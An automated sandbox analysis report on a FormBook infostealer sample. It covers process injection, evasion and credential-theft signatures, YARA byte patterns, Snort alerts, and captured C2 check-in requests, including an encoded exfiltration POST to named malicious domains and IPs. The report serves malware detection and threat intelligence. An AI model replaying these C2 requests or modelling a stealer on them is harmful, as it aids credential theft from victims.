Windows Analysis Report
SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe

Overview

General Information

Sample name: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe
Analysis ID: 1466067
MD5: a6d5020bf8bfe2dc1140a50936ef5ec9
SHA1: 284d6d281a186da8c7bfa0ee5ce310be41be800b
SHA256: ac162f990dd540c5b295e5c8dfccc04374519feaa70ed0439292f70761a034cd
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe (PID: 6952 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe" MD5: A6D5020BF8BFE2DC1140A50936EF5EC9)
    • svchost.exe (PID: 5612 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • DUipWAeQLm.exe (PID: 672 cmdline: "C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RpcPing.exe (PID: 1524 cmdline: "C:\Windows\SysWOW64\RpcPing.exe" MD5: F7DD5764D96A988F0CF9DD4813751473)
          • DUipWAeQLm.exe (PID: 5700 cmdline: "C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6244 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000A.00000002.3339015758.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000A.00000002.3339015758.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e5c2:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17031:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2667649545.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2667649545.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2ef33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x179a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.3339723767.0000000003150000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e133:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16ba2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2ef33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x179a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe", CommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, ParentProcessId: 6952, ParentProcessName: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, ProcessCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe", ProcessId: 5612, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe", CommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, ParentProcessId: 6952, ParentProcessName: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, ProcessCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe", ProcessId: 5612, ProcessName: svchost.exe
Timestamp: 07/02/24-13:54:01.230234 | SID: 2855464 | Source Port: 49735 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 07/02/24-13:53:46.839272 | SID: 2855464 | Source Port: 49730 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 07/02/24-13:53:54.891246 | SID: 2855465 | Source Port: 49733 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 07/02/24-13:53:25.871349 | SID: 2855465 | Source Port: 49727 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 07/02/24-13:53:49.739854 | SID: 2855464 | Source Port: 49731 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 07/02/24-13:54:03.924989 | SID: 2855464 | Source Port: 49736 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 07/02/24-13:53:46.839272 | SID: 2856318 | Source Port: 49730 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected


AV Detection

Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | ReversingLabs: Detection: 47%
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.3339015758.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2667649545.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3339723767.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3339772912.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2670025660.0000000006E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3337846059.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3339477334.0000000002D90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2668432458.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Joe Sandbox ML: detected
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DUipWAeQLm.exe, 00000008.00000002.3338157469.00000000001EE000.00000002.00000001.01000000.00000005.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3337844651.00000000001EE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000003.2100307980.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000003.2100194714.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2463716754.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668017220.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668017220.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2454253649.0000000003800000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3340029491.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000003.2668762022.0000000003153000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3340029491.000000000364E000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000003.2678637133.0000000003309000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdbGCTL source: svchost.exe, 00000002.00000003.2635580745.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635597112.000000000362B000.00000004.00000020.00020000.00000000.sdmp, DUipWAeQLm.exe, 00000008.00000002.3338848477.00000000007A8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000003.2100307980.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000003.2100194714.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2463716754.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668017220.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668017220.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2454253649.0000000003800000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, RpcPing.exe, 00000009.00000002.3340029491.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000003.2668762022.0000000003153000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3340029491.000000000364E000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000003.2678637133.0000000003309000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdb source: svchost.exe, 00000002.00000003.2635580745.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635597112.000000000362B000.00000004.00000020.00020000.00000000.sdmp, DUipWAeQLm.exe, 00000008.00000002.3338848477.00000000007A8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RpcPing.exe, 00000009.00000002.3340567073.0000000003ADC000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3338691097.0000000003062000.00000004.00000020.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000002DAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.3124724882.0000000036F1C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RpcPing.exe, 00000009.00000002.3340567073.0000000003ADC000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3338691097.0000000003062000.00000004.00000020.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000002DAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.3124724882.0000000036F1C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007B4696 GetFileAttributesW,FindFirstFileW,FindClose | 0_2_007B4696
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007BC93C FindFirstFileW,FindClose | 0_2_007BC93C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007BC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf | 0_2_007BC9C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007BF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_007BF200
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007BF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_007BF35D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007BF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose | 0_2_007BF65E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007B3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_007B3A2B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007B3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_007B3D4E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007BBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose | 0_2_007BBF27
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_02C9C400 FindFirstFileW,FindNextFileW,FindClose | 9_2_02C9C400
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_02C9C536 FindFirstFileW,FindNextFileW,FindClose | 9_2_02C9C536
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 4x nop then xor eax, eax | 9_2_02C89BA0
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 4x nop then pop edi | 9_2_02C8E029
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 4x nop then mov ebx, 00000004h | 9_2_032904E8

Networking

Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49727 -> 74.208.236.38:80
Source: Traffic | Snort IDS: 2856318 ETPRO TROJAN FormBook CnC Checkin (POST) M4 192.168.2.6:49730 -> 142.202.6.230:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49730 -> 142.202.6.230:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49731 -> 142.202.6.230:80
Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49733 -> 142.202.6.230:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49735 -> 74.208.236.230:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49736 -> 74.208.236.230:80
Source: Joe Sandbox View | ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View | ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View | ASN Name: REPRISE-HOSTINGUS REPRISE-HOSTINGUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007C25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile | 0_2_007C25E2
Source: global traffic | HTTP traffic detected: GET /9m56/?Stux7=wSNNrhltoDErcnEw+GwIxBUk+E+vX1/TDY+0HSDY/xjQqFM+lgiwoO4LpiVzuA8Bz+prc1fM5Kq2+VzXMkRPNkNvcw4gdSknrLieRXJ4XwgsEWF+LJyDECQspbYqq9pNrRLiTEI=&YF9Df=_VBD7fO8YfupmT HTTP/1.1 | Host: www.costmoon.com | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic | HTTP traffic detected: GET /hqcp/?Stux7=a7ZQHf8WLvhHVBver5nOwZih6r/S4XIGgVvybuFCKLHzqS2zk6yuhV2s1hLkbw5zmPfcdtbcw9raqNmLcm/5Ggyq9qBeDFk3p2MLA1pm9c8F5HyDpkyVADePZbSIOvXG2KyhUgY=&YF9Df=_VBD7fO8YfupmT HTTP/1.1 | Host: www.6171nvuhb.rent | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic | DNS traffic detected: DNS query: www.costmoon.com
Source: global traffic | DNS traffic detected: DNS query: www.6171nvuhb.rent
Source: global traffic | DNS traffic detected: DNS query: www.motorsportgives.com
Source: unknown | HTTP traffic detected: POST /hqcp/ HTTP/1.1 | Host: www.6171nvuhb.rent | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate, br | Origin: http://www.6171nvuhb.rent | Referer: http://www.6171nvuhb.rent/hqcp/ | Content-Length: 210 | Connection: close | Content-Type: application/x-www-form-urlencoded | Cache-Control: max-age=0 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10 | Data Raw: 53 74 75 78 37 3d 58 35 78 77 45 6f 74 53 56 2f 52 53 53 33 4c 58 75 4e 6a 30 32 38 72 30 69 38 76 63 2f 42 30 2f 79 43 66 34 47 66 46 73 45 4b 75 31 79 79 61 67 34 34 53 56 67 46 2b 62 32 41 2f 70 59 79 6b 4f 77 66 4c 77 61 70 4b 4c 36 37 76 6c 72 62 44 72 58 6b 62 6b 45 78 37 41 32 61 56 41 66 6d 4e 62 6d 45 6b 37 52 78 31 38 34 74 68 6e 2b 79 2b 5a 6b 42 50 6d 4d 6d 57 6b 4b 6f 72 6b 45 73 66 42 2b 49 76 74 51 6b 74 6c 79 50 4f 4c 32 7a 55 39 52 74 44 30 38 56 42 6f 68 5a 69 41 70 62 4c 76 45 52 31 36 58 70 4b 66 54 70 31 49 57 36 50 54 6c 33 71 69 65 4c 6f 55 34 31 55 4e 49 37 69 6b 50 77 49 42 4e 77 62 64 57 41 69 4d | Data Ascii: Stux7=X5xwEotSV/RSS3LXuNj028r0i8vc/B0/yCf4GfFsEKu1yyag44SVgF+b2A/pYykOwfLwapKL67vlrbDrXkbkEx7A2aVAfmNbmEk7Rx184thn+y+ZkBPmMmWkKorkEsfB+IvtQktlyPOL2zU9RtD08VBohZiApbLvER16XpKfTp1IW6PTl3qieLoU41UNI7ikPwIBNwbdWAiM
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Content-Length: 626 | Connection: close | Date: Tue, 02 Jul 2024 11:53:26 GMT | Server: Apache | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 02 Jul 2024 11:54:01 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 